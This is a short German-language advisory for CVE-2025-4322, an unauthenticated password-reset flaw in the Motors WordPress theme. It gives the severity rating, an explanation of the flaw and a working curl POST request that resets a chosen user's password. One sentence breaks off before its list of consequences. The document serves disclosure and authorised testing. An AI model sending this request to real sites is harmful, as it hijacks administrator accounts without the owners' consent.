
CVE-2025-4322 – Nicht authentifizierte Rechteerweiterung durch Passwort-Update „Kontoübernahme“ 🔥
Das Motors-Theme für WordPress ist anfällig für Privilegieneskalation durch Kontoübernahme in allen Versionen bis einschließlich 5.6.67. Dies liegt daran, dass das Theme die Identität eines Benutzers vor dem Ändern seines Passworts nicht ordnungsgemäß überprüft. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Benutzerpasswörter, einschließlich derer von Administratoren, zu ändern und so Zugriff auf deren Konten zu erlangen.
CNA: Wordfence Base Score: 9.8 ⚫ CRITICAL Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - Nicht authentifizierte Privilegieneskalation durch Passwort-Update/Kontoübernahme5.6.67Das Motors-WordPress-Theme (bis einschließlich Version 5.6.67) enthält einen kritischen Authentifizierungsfehler in seiner Passwort-Zurücksetzungsfunktion.
Es stellt einen Front-End-Passwortaktualisierungsmechanismus über Endpunkte bereit, versäumt es jedoch, die Benutzeridentität oder Autorisierung vor der Verarbeitung von Passwortänderungen ordnungsgemäß zu überprüfen.
Infolgedessen können nicht authentifizierte Angreifer gezielte HTTP-Anfragen senden, die eine user_id, einen beliebigen hash_check und ein neues Passwort (stm_new_password) bereitstellen, um das Passwort eines beliebigen Benutzers zurückzusetzen – einschließlich Administratoren.
Wenn dies ausgenutzt wird, können Angreifer:
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
Dieser Bericht dient ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken. Die Ausnutzung dieser Schwachstelle ohne Genehmigung kann gegen rechtliche und ethische Grenzen verstoßen.